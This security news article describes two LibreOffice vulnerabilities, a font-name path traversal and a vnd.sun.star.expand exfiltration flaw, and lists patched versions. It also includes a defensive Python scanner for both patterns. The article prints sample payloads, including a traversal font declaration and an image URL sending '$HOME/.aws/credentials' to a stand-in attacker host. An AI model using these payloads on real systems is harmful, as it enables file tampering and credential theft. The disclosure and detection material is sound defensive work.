Tuesday, May 20, 2025
LibreOffice Vulnerabilities Allow Attackers to Write to Files and Extract Data

Two critical vulnerabilities in LibreOffice (CVE-2024-12425 and CVE-2024-12426) expose millions of users to file system manipulation and sensitive data extraction attacks.

These flaws affect both desktop users opening malicious documents and server-side systems using LibreOffice for headless document processing.

CVE-2024-12425: Path Traversal Enables Arbitrary File Writes

The first vulnerability stems from improper path sanitization when handling embedded fonts in OpenDocument XML files.

Attackers can craft documents containing malicious font declarations that escape LibreOffice’s temporary directory through path traversal sequences, as CodeanLabs reports.

The critical code flaw resides in EmbeddedFontsHelper::fileUrlForTemporaryFont, where user-controlled fontName values aren’t sanitized before constructing file paths:

OUString EmbeddedFontsHelper::fileUrlForTemporaryFont(const OUString& fontName) {
    // ...
    path += "/user/temp/embeddedfonts/fromdocs/";
    return path + filename; // fontName reaches this path unsanitized
}

An attacker could exploit this by embedding a font declaration containing directory traversal sequences:

<style:font-face svg:font-family="../../../../../../../etc/passwd">
  <office:binaryData>SGVsbG8gd29ybGQ...</office:binaryData>
</style:font-face>

This writes the decoded binary data to /etc/passwd0.ttf: the write escapes the temporary directory, although the resulting file name is still limited to a .ttf extension.

Server-side installations are particularly vulnerable as attackers could overwrite web application files or configuration scripts.

CVE-2024-12426: Variable Expansion Enables Data Exfiltration

The second vulnerability involves LibreOffice’s handling of the vnd.sun.star.expand URI scheme, which supports environment variable substitution and INI file parsing. Attackers can craft documents that leak sensitive information through manipulated URLs:

<img src="vnd.sun.star.expand:http://attacker.com?leak=$HOME/.aws/credentials">

The expansion mechanism supports recursive lookups, enabling complex data extraction chains:

<img src="vnd.sun.star.expand:${file://$HOME/.thunderbird/profiles.ini:Profile0:Path}/...">

This allows reading Thunderbird profiles, SQLite databases, and application secrets stored in environment variables. In one demonstrated attack, hackers could intercept WordPress password reset tokens from email clients by combining multiple expansion steps.
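A defender-side check for both issues described above, as an added example that is not part of the original article or of LibreOffice: it scans an ODF package or a flat XML/HTML file for font-family attribute values containing path separators and for any vnd.sun.star.expand: URI. The function names, rule labels and the constructed sample (including the collector.example host) are assumptions made for illustration.

```python
import html
import io
import re
import zipfile

# Matches name="value" or name='value' attribute pairs in XML or HTML text.
ATTR = re.compile(r'([\w:.-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\')')


def scan_text(member, text):
    """Return (member, rule, value) tuples for one XML/HTML part."""
    findings = []
    for m in ATTR.finditer(text):
        value = html.unescape(m.group(2) or m.group(3) or "").strip()
        # Font names become file names, so separators or ".." are suspicious.
        if m.group(1).endswith("font-family") and re.search(r"\.\.|[/\\]", value):
            findings.append((member, "font-path-traversal", value))
        # The expand scheme substitutes variables and INI values into the URL.
        if value.lower().startswith("vnd.sun.star.expand:"):
            findings.append((member, "expand-uri", value))
    return findings


def scan_document(data):
    """Scan an ODF package (zip) or a flat XML/HTML document given as bytes."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return scan_text("<flat>", data.decode("utf-8", "replace"))
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for member in pkg.namelist():
            if member.lower().endswith((".xml", ".html", ".htm")):
                findings += scan_text(member, pkg.read(member).decode("utf-8", "replace"))
    return findings


def build_sample():
    """Constructed ODT-like package reusing the two patterns the article quotes."""
    content = (
        '<style:font-face style:name="F1" svg:font-family="Liberation Serif"/>'
        '<style:font-face style:name="F2" svg:font-family="&#46;&#46;/../etc/passwd"/>'
        '<draw:image xlink:href="vnd.sun.star.expand:http://collector.example?leak=$HOME"/>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("content.xml", content)
    return buf.getvalue()


if __name__ == "__main__":
    print(*scan_document(build_sample()), sep="\n")
```

Run over uploads before they reach a headless LibreOffice converter, this works as a pre-filter alongside the patched versions; attribute values are entity-decoded first so that encoded traversal sequences are still caught.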

LibreOffice released patches addressing these vulnerabilities in versions:

  • 7.5.9 (Community)
  • 7.6.5 (Community)
  • 24.2.2 (Enterprise)

These vulnerabilities highlight the risks of complex document processing ecosystems, particularly when combining user-controlled content with legacy file format support.

Enterprises must maintain rigorous patch management cycles for office software components, even in server environments.

Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.